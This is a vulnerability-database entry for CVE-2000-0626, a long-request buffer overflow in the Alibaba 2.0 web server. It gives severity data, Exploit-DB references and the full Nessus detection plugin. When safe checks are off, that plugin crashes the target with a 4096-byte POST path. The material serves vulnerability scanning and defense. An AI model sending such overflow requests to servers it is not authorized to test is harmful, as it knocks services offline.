Vulnerabilities > CVE-2000-0626 - Unspecified vulnerability in Computer Software Manufaktur Alibaba 2.0

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
NONE
Integrity impact
NONE
Availability impact
PARTIAL
network
low complexity
computer-software-manufaktur
nessus
exploit available
NVD
Published: 2000-07-18
Updated: 2008-09-10

Summary

Buffer overflow in Alibaba web server allows remote attackers to cause a denial of service via a long GET request.

Vulnerable Configurations

Part Description Count
Application
Computer_Software_Manufaktur
1

Exploit-Db

  • descriptionComputer Software Manufaktur Alibaba 2.0 DoS Vulnerability. CVE-2000-0626. Dos exploit for windows platform
    idEDB-ID:20080
    last seen2016-02-02
    modified2000-07-18
    published2000-07-18
    reporterwildcoyote
    sourcehttps://www.exploit-db.com/download/20080/
    titleComputer Software Manufaktur Alibaba 2.0 DoS Vulnerability
  • descriptionComputer Software Manufaktur Alibaba 2.0 Piped Command Vulnerability. CVE-2000-0626. Remote exploit for cgi platform
    idEDB-ID:20085
    last seen2016-02-02
    modified2000-07-18
    published2000-07-18
    reporterPrizm
    sourcehttps://www.exploit-db.com/download/20085/
    titleComputer Software Manufaktur Alibaba 2.0 Piped Command Vulnerability

Nessus

NASL familyWeb Servers
NASL idALIBABA_OVERFLOW.NASL
descriptionIt is possible to make the remote web server execute arbitrary commands by sending the following request: POST AA[...]AA/ HTTP/1.0 This problem may allow an attacker to execute arbitrary code on the remote system or create a denial of service (DoS) attack.
last seen2020-06-01
modified2020-06-02
plugin id10012
published1999-10-29
reporterThis script is Copyright (C) 1999-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/10012
titleAlibaba Web Server 2.0 HTTP Request Overflow DoS
code
#
# (C) Tenable Network Security, Inc.
#


include("compat.inc");

if(description)
{
 script_id(10012);
 script_version ("1.40");
 script_cvs_date("Date: 2018/06/27 18:42:26");

 script_cve_id("CVE-2000-0626");
 script_bugtraq_id(1482);

 script_name(english: "Alibaba Web Server 2.0 HTTP Request Overflow DoS");
 
 script_set_attribute(attribute:"synopsis", value:
"The remote web server seems to be vulnerable to a buffer overflow." );
 script_set_attribute(attribute:"description", value:
"It is possible to make the remote web server execute
arbitrary commands by sending the following request:

	POST AA[...]AA/ HTTP/1.0
	
This problem may allow an attacker to execute arbitrary code on
the remote system or create a denial of service (DoS) attack." );
 script_set_attribute(attribute:"solution", value:
"At the time of this writing, no solution was available. 
Check with your vendor for a possible patch, or consider changing your
web server." );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C");
 script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");

 script_set_attribute(attribute:"plugin_publication_date", value: "1999/10/29");
 script_set_attribute(attribute:"vuln_publication_date", value: "2000/07/18");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();

 script_summary(english: "Alibaba buffer overflow");
 script_category(ACT_MIXED_ATTACK);
 script_copyright(english:"This script is Copyright (C) 1999-2018 Tenable Network Security, Inc.");
 script_family(english: "Web Servers"); 
 script_dependencie("http_version.nasl", "www_too_long_url.nasl");
 script_exclude_keys("www/too_long_url_crash");
 script_require_ports("Services/www", 80);
 exit(0);
}

#
# The script code starts here
#

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");


port = get_http_port(default:80);
banner = get_http_banner(port: port);
 
if(!egrep(pattern:"^Server:.*[aA]libaba.*", string:banner)) exit(0);

if(safe_checks())
{
  if ( report_paranoia < 2 ) exit(0);
  security_hole(port:port, extra:
"Nessus reports this vulnerability using only information that 
was gathered. Use caution when testing without safe checks 
enabled.");
  exit(0);
}

if(http_is_dead(port:port))exit(0);
r = http_send_recv3(port: port, method: 'POST', item: strcat(crap(4096), "/"));
if (http_is_dead(port: port, retry: 3)) security_hole(port);

References